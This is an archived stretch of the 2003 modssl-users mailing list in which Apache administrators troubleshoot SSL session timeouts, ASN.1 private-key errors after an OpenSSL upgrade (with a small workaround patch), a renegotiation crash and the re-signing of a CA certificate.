That was Mozilla 1.5 under Redhat 8 talking to Apache 1.3.27/mod_ssl-2.8.12-2

Timeout 300
KeepAliveTimeout 15
SSLSessionCache         dbm:logs/ssl_scache
SSLSessionCacheTimeout  300

> openssl s_client -connect HOST:PORT -reconnect

That appears to work fine here too - I get the "reused" line...

-- 
Cheers

Jason Haar
Information Security Manager, Trimble Navigation Ltd.
Phone: +64 3 9635 377 Fax: +64 3 9635 417
PGP Fingerprint: 7A2E 0407 C9A6 CAF6 2B9F 8422 C063 5EBB FE1D 66D1
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Oct  8 09:10:37 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 1B0A2A8942; Wed,  8 Oct 2003 09:10:37 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from toftum.dk (toftum.dk [193.88.12.46])
	by master.modssl.org (Postfix) with ESMTP id C123DA8935
	for ; Wed,  8 Oct 2003 09:10:18 +0200 (CEST)
Received: by toftum.dk (Postfix, from userid 1001)
	id E0E0F6E40BB; Wed,  8 Oct 2003 09:10:13 +0200 (CEST)
Date: Wed, 8 Oct 2003 09:10:13 +0200
From: Mads Toftum 
To: modssl-users@modssl.org
Subject: Re: Webpage over SSL timing out?
Message-ID: <20031008071013.GB3187@toftum.dk>
Mail-Followup-To: modssl-users@modssl.org
References: 
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: 
X-Mailer: mutt
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Mads Toftum 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Tue, Oct 07, 2003 at 07:17:06PM -0700, Sarah Haff wrote:
> >Other suggestions could be turning on keepalives and possibly to remove
> >some of the weaker cipher options from SSLCipherSuite.
> How does removing weaker cipher improve the performance.

It doesn't improve performance - but I've seen cases where Internet Explorer
would allow a session to live longer if it was negotiated to a newer cipher
like TLS instead of SSLv2.
> 
> >How does the cpu usage look on the server? If the load isn't high, then
> >you probably won't win much with an ssl accelerator.
> It is a quad CPU server 2.8 Ghz, so the max CPU usage goes to 10% per CPU.
> 
If that is the case, then it doesn't seem likely to me that a hardware
accelerator will improve things much. With that much cpu power to spare,
there shouldn't be any significant slowdown in the connect. If you have an
SSL enabled benchmark tool (could be a recent ab from apache), then try 
seeing what happens when you run a number of concurrent requests - do they
start to fail?

I'm inclined to think that the problem could be related to keepalives, where
Internet Explorer tries to open more connections than it can handle at once
because keepalives are turned off (the SetEnvIf I mentioned). It should be
possible to determine with netstat or LogLevel debug.
If that isn't the case, then I can only think of things like a blocking
random device, or some other resource being exhausted.

vh

Mads Toftum
-- 
Speaking at ApacheCon 2003 - http://ApacheCon.com/
T03, "Apache 2 mod_ssl tutorial" (3h)
WE03, "Troubleshooting Apache configurations" 
WE11, "Apache mod_rewrite, the Swiss Army Knife of URL manipulation" 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Oct  8 12:57:23 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 8A990A8942; Wed,  8 Oct 2003 12:57:23 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from smtp.istop.com (dci.doncaster.on.ca [66.11.168.194])
	by master.modssl.org (Postfix) with ESMTP id 9BBA4A8935
	for ; Wed,  8 Oct 2003 12:57:06 +0200 (CEST)
Received: from ns.istop.com (ns.istop.com [66.11.168.199])
	by smtp.istop.com (Postfix) with ESMTP id ED70536AD8
	for ; Wed,  8 Oct 2003 06:56:54 -0400 (EDT)
Date: Wed, 8 Oct 2003 06:56:54 -0400 (EDT)
From: Jeffrey Burgoyne 
X-X-Sender: burgoyne@ns.istop.com
To: modssl-users@modssl.org
Subject: ASN.1 Encoding errors
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Jeffrey Burgoyne 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi;

I just upgraded an Apache server 1.3.26 with OpenSSL 0.9.7c and mod_ssl
2.8.9 from Openssl 0.9.6d.

I now get the following errors :

Server www.eac-trousse.ic.gc.ca:443 (RSA)
Enter pass phrase:

Server biotech.gc.ca:443 (RSA)
213659:error:0D094068:asn1 encoding routines:d2i_ASN1_SET:bad
tag:a_set.c:179:
213659:error:0D0680A8:asn1 encoding routines:ASN1_CHECK_TLEN:wrong
tag:tasn_dec.c:946:
213659:error:0D07803A:asn1 encoding routines:ASN1_ITEM_EX_D2I:nested asn1
error:tasn_dec.c:304:Type=RSA
213659:error:0D09A00D:asn1 encoding routines:d2i_PrivateKey:ASN1
lib:d2i_pr.c:96:
Enter pass phrase:

Server strategis.gc.ca:443 (RSA)
213659:error:0D094068:asn1 encoding routines:d2i_ASN1_SET:bad
tag:a_set.c:179:
213659:error:0D0680A8:asn1 encoding routines:ASN1_CHECK_TLEN:wrong
tag:tasn_dec.c:946:
213659:error:0D07803A:asn1 encoding routines:ASN1_ITEM_EX_D2I:nested asn1
error:tasn_dec.c:304:Type=RSA
213659:error:0D09A00D:asn1 encoding routines:d2i_PrivateKey:ASN1
lib:d2i_pr.c:96:
Enter pass phrase:

Server production.paymentnotification.ic.gc.ca:443 (RSA)
Enter pass phrase:

Server ip-pi.gc.ca:443 (RSA)
Enter pass phrase:

Server cbac-cccb.ca:443 (RSA)
Enter pass phrase:

Server corporations.ic.gc.ca:443 (RSA)
Enter pass phrase:

Server corporationscanada.ic.gc.ca:443 (RSA)
213659:error:0D094068:asn1 encoding routines:d2i_ASN1_SET:bad
tag:a_set.c:179:
213659:error:0D0680A8:asn1 encoding routines:ASN1_CHECK_TLEN:wrong
tag:tasn_dec.c:946:
213659:error:0D07803A:asn1 encoding routines:ASN1_ITEM_EX_D2I:nested asn1
error:tasn_dec.c:304:Type=RSA
213659:error:0D09A00D:asn1 encoding routines:d2i_PrivateKey:ASN1
lib:d2i_pr.c:96:
Enter pass phrase:

Ok: Pass Phrase Dialog successful.
/usr/local/apache/bin/apachectl startssl: httpd started
strategis>



The virtual hosts with the error still seem to work fine.

Ideas?

Jeffrey Burgoyne
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Oct  8 13:03:36 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 3DC76A895F; Wed,  8 Oct 2003 13:03:36 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from smtp.istop.com (dci.doncaster.on.ca [66.11.168.194])
	by master.modssl.org (Postfix) with ESMTP id CEA78A893C
	for ; Wed,  8 Oct 2003 13:03:34 +0200 (CEST)
Received: from ns.istop.com (ns.istop.com [66.11.168.199])
	by smtp.istop.com (Postfix) with ESMTP id BDD5636AD6
	for ; Wed,  8 Oct 2003 07:03:33 -0400 (EDT)
Date: Wed, 8 Oct 2003 07:03:33 -0400 (EDT)
From: Jeffrey Burgoyne 
X-X-Sender: burgoyne@ns.istop.com
To: "modssl-users@modssl.org" 
Subject: Re: ASN.1 Encoding errors
In-Reply-To: 
Message-ID: 
References: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Jeffrey Burgoyne 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


Hmm, just noticed something a bit more suspicious. The error does not come
up every time for the same certs. It sometimes does not seem to come up at
all.

Jeff

On Wed, 8 Oct 2003, Jeffrey Burgoyne wrote:

> Hi;
>
> I just upgraded an Apache server 1.3.26 with OpenSSL 0.9.7c and mod_ssl
> 2.8.9 from Openssl 0.9.6d.
>
> I now get the following errors :
>
> Server www.eac-trousse.ic.gc.ca:443 (RSA)
> Enter pass phrase:
>
> Server biotech.gc.ca:443 (RSA)
> 213659:error:0D094068:asn1 encoding routines:d2i_ASN1_SET:bad
> tag:a_set.c:179:
> 213659:error:0D0680A8:asn1 encoding routines:ASN1_CHECK_TLEN:wrong
> tag:tasn_dec.c:946:
> 213659:error:0D07803A:asn1 encoding routines:ASN1_ITEM_EX_D2I:nested asn1
> error:tasn_dec.c:304:Type=RSA
> 213659:error:0D09A00D:asn1 encoding routines:d2i_PrivateKey:ASN1
> lib:d2i_pr.c:96:
> Enter pass phrase:
>
> Server strategis.gc.ca:443 (RSA)
> 213659:error:0D094068:asn1 encoding routines:d2i_ASN1_SET:bad
> tag:a_set.c:179:
> 213659:error:0D0680A8:asn1 encoding routines:ASN1_CHECK_TLEN:wrong
> tag:tasn_dec.c:946:
> 213659:error:0D07803A:asn1 encoding routines:ASN1_ITEM_EX_D2I:nested asn1
> error:tasn_dec.c:304:Type=RSA
> 213659:error:0D09A00D:asn1 encoding routines:d2i_PrivateKey:ASN1
> lib:d2i_pr.c:96:
> Enter pass phrase:
>
> Server production.paymentnotification.ic.gc.ca:443 (RSA)
> Enter pass phrase:
>
> Server ip-pi.gc.ca:443 (RSA)
> Enter pass phrase:
>
> Server cbac-cccb.ca:443 (RSA)
> Enter pass phrase:
>
> Server corporations.ic.gc.ca:443 (RSA)
> Enter pass phrase:
>
> Server corporationscanada.ic.gc.ca:443 (RSA)
> 213659:error:0D094068:asn1 encoding routines:d2i_ASN1_SET:bad
> tag:a_set.c:179:
> 213659:error:0D0680A8:asn1 encoding routines:ASN1_CHECK_TLEN:wrong
> tag:tasn_dec.c:946:
> 213659:error:0D07803A:asn1 encoding routines:ASN1_ITEM_EX_D2I:nested asn1
> error:tasn_dec.c:304:Type=RSA
> 213659:error:0D09A00D:asn1 encoding routines:d2i_PrivateKey:ASN1
> lib:d2i_pr.c:96:
> Enter pass phrase:
>
> Ok: Pass Phrase Dialog successful.
> /usr/local/apache/bin/apachectl startssl: httpd started
> strategis>
>
>
>
> The virtual hosts with the error still seem to work fine.
>
> Ideas?
>
> Jeffrey Burgoyne
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Oct  8 13:14:08 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 64A71A8942; Wed,  8 Oct 2003 13:14:08 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from orb.pobox.com (orb.pobox.com [216.65.124.72])
	by master.modssl.org (Postfix) with ESMTP id 07B49A8935
	for ; Wed,  8 Oct 2003 13:14:00 +0200 (CEST)
Received: from texas.pobox.com (texas.pobox.com[64.49.223.111])
	by orb.pobox.com (Postfix) with ESMTP id A27D7149108
	for ; Wed,  8 Oct 2003 07:13:55 -0400 (EDT)
Received: from yourpa86z1i3g7 (unknown [209.210.104.210])
	by texas.pobox.com (Postfix) with ESMTP id 870C04534B
	for ; Wed,  8 Oct 2003 07:13:54 -0400 (EDT)
From: "Dave Paris" 
To: 
Subject: RE: ASN.1 Encoding errors
Date: Wed, 8 Oct 2003 07:14:00 -0400
Message-ID: 
MIME-Version: 1.0
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0)
In-Reply-To: 
Importance: Normal
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1165
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Dave Paris" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Wonder if this has anything to do with the recent "repairs" to the ASN.1
subsystem in OpenSSL.  http://www.openssl.org/news/secadv_20030930.txt

-dsp

-----Original Message-----
From: owner-modssl-users@modssl.org
[mailto:owner-modssl-users@modssl.org]On Behalf Of Jeffrey Burgoyne
Sent: Wednesday, October 08, 2003 7:04 AM
To: modssl-users@modssl.org
Subject: Re: ASN.1 Encoding errors



Hmm, just noticed something a bit more suspicious. The error does not come
up every time for the same certs. It sometimes does not seem to come up at
all.

Jeff

On Wed, 8 Oct 2003, Jeffrey Burgoyne wrote:

> Hi;
>
> I just upgraded an Apache server 1.3.26 with OpenSSL 0.9.7c and mod_ssl
> 2.8.9 from Openssl 0.9.6d.
>
> I now get the following errors :
>
> Server www.eac-trousse.ic.gc.ca:443 (RSA)
> Enter pass phrase:
>
> Server biotech.gc.ca:443 (RSA)
> 213659:error:0D094068:asn1 encoding routines:d2i_ASN1_SET:bad
> tag:a_set.c:179:
> 213659:error:0D0680A8:asn1 encoding routines:ASN1_CHECK_TLEN:wrong
> tag:tasn_dec.c:946:
> 213659:error:0D07803A:asn1 encoding routines:ASN1_ITEM_EX_D2I:nested asn1
> error:tasn_dec.c:304:Type=RSA
> 213659:error:0D09A00D:asn1 encoding routines:d2i_PrivateKey:ASN1
> lib:d2i_pr.c:96:
> Enter pass phrase:
>
> Server strategis.gc.ca:443 (RSA)
> 213659:error:0D094068:asn1 encoding routines:d2i_ASN1_SET:bad
> tag:a_set.c:179:
> 213659:error:0D0680A8:asn1 encoding routines:ASN1_CHECK_TLEN:wrong
> tag:tasn_dec.c:946:
> 213659:error:0D07803A:asn1 encoding routines:ASN1_ITEM_EX_D2I:nested asn1
> error:tasn_dec.c:304:Type=RSA
> 213659:error:0D09A00D:asn1 encoding routines:d2i_PrivateKey:ASN1
> lib:d2i_pr.c:96:
> Enter pass phrase:
>
> Server production.paymentnotification.ic.gc.ca:443 (RSA)
> Enter pass phrase:
>
> Server ip-pi.gc.ca:443 (RSA)
> Enter pass phrase:
>
> Server cbac-cccb.ca:443 (RSA)
> Enter pass phrase:
>
> Server corporations.ic.gc.ca:443 (RSA)
> Enter pass phrase:
>
> Server corporationscanada.ic.gc.ca:443 (RSA)
> 213659:error:0D094068:asn1 encoding routines:d2i_ASN1_SET:bad
> tag:a_set.c:179:
> 213659:error:0D0680A8:asn1 encoding routines:ASN1_CHECK_TLEN:wrong
> tag:tasn_dec.c:946:
> 213659:error:0D07803A:asn1 encoding routines:ASN1_ITEM_EX_D2I:nested asn1
> error:tasn_dec.c:304:Type=RSA
> 213659:error:0D09A00D:asn1 encoding routines:d2i_PrivateKey:ASN1
> lib:d2i_pr.c:96:
> Enter pass phrase:
>
> Ok: Pass Phrase Dialog successful.
> /usr/local/apache/bin/apachectl startssl: httpd started
> strategis>
>
>
>
> The virtual hosts with the error still seem to work fine.
>
> Ideas?
>
> Jeffrey Burgoyne
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org



______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Oct  8 13:49:11 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 60CE4A895F; Wed,  8 Oct 2003 13:49:11 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from lacrosse.corp.redhat.com (pix-525-pool.redhat.com [66.187.233.200])
	by master.modssl.org (Postfix) with ESMTP id 60A7FA8935
	for ; Wed,  8 Oct 2003 13:48:47 +0200 (CEST)
Received: from radish.cambridge.redhat.com (radish.cambridge.redhat.com [172.16.18.90])
	by lacrosse.corp.redhat.com (8.11.6/8.9.3) with ESMTP id h98Bmik05323
	for ; Wed, 8 Oct 2003 07:48:44 -0400
Received: from radish.cambridge.redhat.com (localhost.localdomain [127.0.0.1])
	by radish.cambridge.redhat.com (8.12.10/8.12.7) with ESMTP id h98BmhlB027530
	for ; Wed, 8 Oct 2003 12:48:44 +0100
Received: (from jorton@localhost)
	by radish.cambridge.redhat.com (8.12.10/8.12.10/Submit) id h98Bmhai027529
	for modssl-users@modssl.org; Wed, 8 Oct 2003 12:48:43 +0100
Date: Wed, 8 Oct 2003 12:48:42 +0100
From: Joe Orton 
To: modssl-users@modssl.org
Subject: Re: ASN.1 Encoding errors
Message-ID: <20031008114842.GA27170@redhat.com>
Mail-Followup-To: modssl-users@modssl.org
References: 
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: 
User-Agent: Mutt/1.4.1i
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Joe Orton 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Wed, Oct 08, 2003 at 06:56:54AM -0400, Jeffrey Burgoyne wrote:
> Hi;
> 
> I just upgraded an Apache server 1.3.26 with OpenSSL 0.9.7c and mod_ssl
> 2.8.9 from Openssl 0.9.6d.
> 
> I now get the following errors :
> 
> Server www.eac-trousse.ic.gc.ca:443 (RSA)
> Enter pass phrase:
> 
> Server biotech.gc.ca:443 (RSA)
> 213659:error:0D094068:asn1 encoding routines:d2i_ASN1_SET:bad
> tag:a_set.c:179:
...

Yes, we've noticed this too.  A reproduction case is with three keys all
with different passphrases: if you enter the correct pass phrase at each
prompt, you get the error after the third prompt.

Here is a workaround for mod_ssl 2.8.x:

--- ssl_engine_pphrase.c~	2002-02-23 18:45:45.000000000 +0000
+++ ssl_engine_pphrase.c	2003-10-08 12:45:35.000000000 +0100
@@ -237,6 +237,9 @@
                     ssl_die();
                 }
                 cpPassPhraseCur = NULL;
+
+                ERR_clear_error();
+
                 bReadable = ((pPrivateKey = SSL_read_PrivateKey(fp, NULL,
                              ssl_pphrase_Handle_CB)) != NULL ? TRUE : FALSE);
                 ap_pfclose(p, fp);


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Oct  8 16:29:14 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 4D303A89E6; Wed,  8 Oct 2003 16:29:14 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from hotmail.com (bay9-f44.bay9.hotmail.com [64.4.47.44])
	by master.modssl.org (Postfix) with ESMTP id 8FE60A89A3
	for ; Wed,  8 Oct 2003 16:28:55 +0200 (CEST)
Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC;
	 Wed, 8 Oct 2003 07:28:53 -0700
Received: from 192.55.4.36 by by9fd.bay9.hotmail.msn.com with HTTP;
	Wed, 08 Oct 2003 14:28:53 GMT
X-Originating-IP: [192.55.4.36]
X-Originating-Email: [sarah_haff@hotmail.com]
From: "Sarah Haff" 
To: modssl-users@modssl.org
Subject: Re: Webpage over SSL timing out?
Date: Wed, 08 Oct 2003 07:28:53 -0700
Mime-Version: 1.0
Content-Type: text/plain; format=flowed
Message-ID: 
X-OriginalArrivalTime: 08 Oct 2003 14:28:53.0798 (UTC) FILETIME=[7FFF8460:01C38DA8]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Sarah Haff" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hello Mads,

What are the content of the log/ssl_scache file???
SSLSessionCache        shmcb:logs/ssl_scache(512000)

Is it just a pointer to the hash-table in the memory?

Thanks
Sarah

_________________________________________________________________
Help protect your PC.  Get a FREE computer virus scan online from McAfee. 
http://clinic.mcafee.com/clinic/ibuy/campaign.asp?cid=3963

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Oct  9 22:27:26 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 00B46A8959; Thu,  9 Oct 2003 22:27:25 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from web20505.mail.yahoo.com (web20505.mail.yahoo.com [216.136.226.140])
	by master.modssl.org (Postfix) with SMTP id E9AAEA8933
	for ; Thu,  9 Oct 2003 22:27:08 +0200 (CEST)
Message-ID: <20031009202707.96507.qmail@web20505.mail.yahoo.com>
Received: from [212.159.119.43] by web20505.mail.yahoo.com via HTTP; Thu, 09 Oct 2003 13:27:07 PDT
Date: Thu, 9 Oct 2003 13:27:07 -0700 (PDT)
From: Matt Stevenson 
Subject: SIGBUS after upgrading to mod_ssl-2.8.15-1.3.28 and using +OptRenegotiate
To: modssl-users@modssl.org
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Matt Stevenson 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi,

With the release of openssl-0.9.6k I recompiled and
updated my apache installs to 1.3.28/modssl-2.8.15
from 1.3.27/modssl-2.8.12. I compiled up on Linux and
Solaris. When running I randomly get a SIGBUS on
Solaris and a SIGSEGV on linux. I'm using client
certificates. I've a large number of servers (>50)
running fine on 1.3.27/2.8.12.

The issue seems to be with the "SSLOptions
+OptRenegotiate" option. When going from a non client
cert location to a client cert location.

The backtrace from dbx on solaris is

t@1 (l@1) signal BUS (invalid address alignment) in
sk_value at 0xfebed534
0xfebed534: sk_value+0x0014:    ld      [%g3 + %g2],
%o0
(/opt/SUNWspro/bin/../WS6/bin/sparcv9/dbx) where
current thread: t@1
=>[1] sk_value(0x132990, 0x0, 0x3, 0xfed27eb0, 0x260,
0x132980), at 0xfebed534
  [2] X509_NAME_oneline(0x132980, 0x0, 0x0, 0x0, 0xc7,
0xffbef4d0), at 0xfec1e6dc
  [3] ssl_hook_Access(0xf0f30, 0xfed64cf4, 0xad400,
0x24bec, 0x0, 0xf26b8), at 0xfed65b74
  [4] run_method(0xf0f30, 0x10, 0x1, 0x0, 0x0,
0xff00), at 0x2052c
  [5] ap_check_access(0xf0f30, 0x93460, 0x93400,
0x91659, 0x45, 0x65), at 0x20620
  [6] process_request_internal(0xf0f30, 0x0, 0x16,
0xcd, 0xeffffc00, 0x1), at 0x40180
  [7] ap_process_request(0xf0f30, 0xc8, 0xf0f30,
0xffbef8e0, 0xffbef8f0, 0x5), at 0x405ac
  [8] child_main(0x5, 0x31298, 0x31000, 0xff17b250,
0xff175980, 0xff16efe0), at 0x33284
  [9] make_child(0xb0bf0, 0x5, 0x3f8154e3, 0xcd,
0xff23b1d4, 0xffbefa18), at 0x335fc
  [10] perform_idle_server_maintenance(0x0,
0xffbefb1c, 0x0, 0xb0bf0, 0x90ed8, 0x8fa80), at
0x33b10
  [11] standalone_main(0x6, 0xffbefc4c, 0x0, 0x0,
0xff23b02c, 0x90ff0), at 0x34384
  [12] main(0x6, 0xffbefc4c, 0xffbefc68, 0xadd98, 0x0,
0x0), at 0x34cc4

the cofiguration for a typical SSL server is ...

SSLEngine on
SSLCipherSuite
ALL:!ADH:!EXP56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP
SSLCertificateFile
/opt/apache_test/conf/ssl.crt/server.crt
SSLCertificateKeyFile
/opt/apache_test/conf/ssl.key/server.key
SSLCACertificateFile
/opt/apache_test/conf/ssl.crt/CA.crt
SSLVerifyDepth  2
SSLOptions +StdEnvVars +ExportCertData

SSLPassPhraseDialog  builtin
SSLSessionCache       
shmcb:/opt/apache_test/sites/debug.internal.net/logs/ssl_scache(512000)
SSLSessionCacheTimeout  300
SSLMutex 
file:/opt/apache_test/sites/debug.internal.net/logs/ssl_mutex
SSLRandomSeed startup builtin
SSLRandomSeed connect builtin
SSLLog
/opt/apache_test/sites/debug.internal.net/logs/ssl_engine_log
SSLLogLevel Warn


 SSLVerifyClient optional
 SSLOptions +OptRenegotiate


When entering the images directory some but not all of
the httpd children die. I'm going to get a linux debug
server running. Hopefully someone can replicate the
issue? Or suggest a fix.

Thanks
Matt


__________________________________
Do you Yahoo!?
The New Yahoo! Shopping - with improved product search
http://shopping.yahoo.com
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Oct  9 23:53:48 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 56752A8959; Thu,  9 Oct 2003 23:53:48 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from pluto.trimble.co.nz (pluto.trimble.co.nz [210.86.12.194])
	by master.modssl.org (Postfix) with ESMTP id C5F95A8933
	for ; Thu,  9 Oct 2003 23:53:29 +0200 (CEST)
Received: (qmail 8525 invoked from network); 10 Oct 2003 10:53:10 +1300
Received: from venus.trimble.co.nz (10.3.0.220)
  by pluto.trimble.co.nz with SMTP; 10 Oct 2003 10:53:10 +1300
Received: (qmail 21641 invoked by uid 5106); 9 Oct 2003 21:53:10 -0000
Received: from jhaar@trimble.co.nz by venus.trimble.co.nz by uid 101 with qmail-scanner-1.20rc4 
 (trophie: 6.510-1002/646/55645. sophie: 3.02/2.14/3.69. spamassassin: 2.60.  Clear:RC:1:. 
 Processed in 0.139149 secs); 09 Oct 2003 21:53:10 -0000
Received: from crom.trimble.co.nz (10.3.0.198)
  by venus.trimble.co.nz with SMTP; 9 Oct 2003 21:53:09 -0000
Received: (qmail 27811 invoked by uid 500); 9 Oct 2003 21:53:09 -0000
Date: Fri, 10 Oct 2003 10:53:09 +1300
From: Jason Haar 
To: modssl-users@modssl.org
Subject: Can I "resign" an existing CA cert without breaking anything?
Message-ID: <20031009215309.GO31653@trimble.co.nz>
Mail-Followup-To: Jason Haar ,
	modssl-users@modssl.org
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.4.1i
Organization: Trimble Navigation New Zealand Ltd.
X-Spam-Rating: pluto.trimble.co.nz 1.6.3-jlh 0/200100/A
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Jason Haar 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

...a bit naive I know, but I'd rather be safe than regret it a week later ;-)

We have an existing internal CA designed around a OpenSSL 0.9.5 signed CA
(obviously we're using a newer release of OpenSSL now - but the CA cert was
created under 0.9.5).

It's all working well - until now. We have found that we cannot sign certs
created by Cisco IOS - well it can - but then the Cisco refuses to use it.
Upon talking to Cisco, they say it's because our CA has a Serial number of
"0" - which is illegal(!?). They said this was a known bug in OpenSSL that
was fixed in a later release...

Anyway, if all that is true, I'd like to simply re-create the CA cert under
a newer OpenSSL release - using the existing private key and serial number 1
- which for some reason is actually available (the first signed cert starts
at 2 - don't know why!). 

If I do that (i.e. "openssl req -key "existing.key" -x509 -new ..."), will
it break the existing infrastructure? I've gone as far as creating the new
CA public key/"root cert", and diff'ing it against the old signed cert just
shows different serial number, dates and some signature hexes look
different. I mean, the public key created from the private key looks
identical to the old public key, so existing (old) HTTPS web servers that
only accept connections from client certs signed by our (old) CA should
happily accept client certs signed by our (new) CA?  What about CRL? We make
extensive use of CRL to ensure only valid certs are accepted, so I'm worried
about that breaking. 

I pretty sure that is doable - I'm just worried there are know bugs/issues
around this that may sting me a week/month later...

Thanks!


-- 
Cheers

Jason Haar
Information Security Manager, Trimble Navigation Ltd.
Phone: +64 3 9635 377 Fax: +64 3 9635 417
PGP Fingerprint: 7A2E 0407 C9A6 CAF6 2B9F 8422 C063 5EBB FE1D 66D1
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Oct 11 18:02:00 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id E85B7A8A4B; Sat, 11 Oct 2003 18:01:59 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
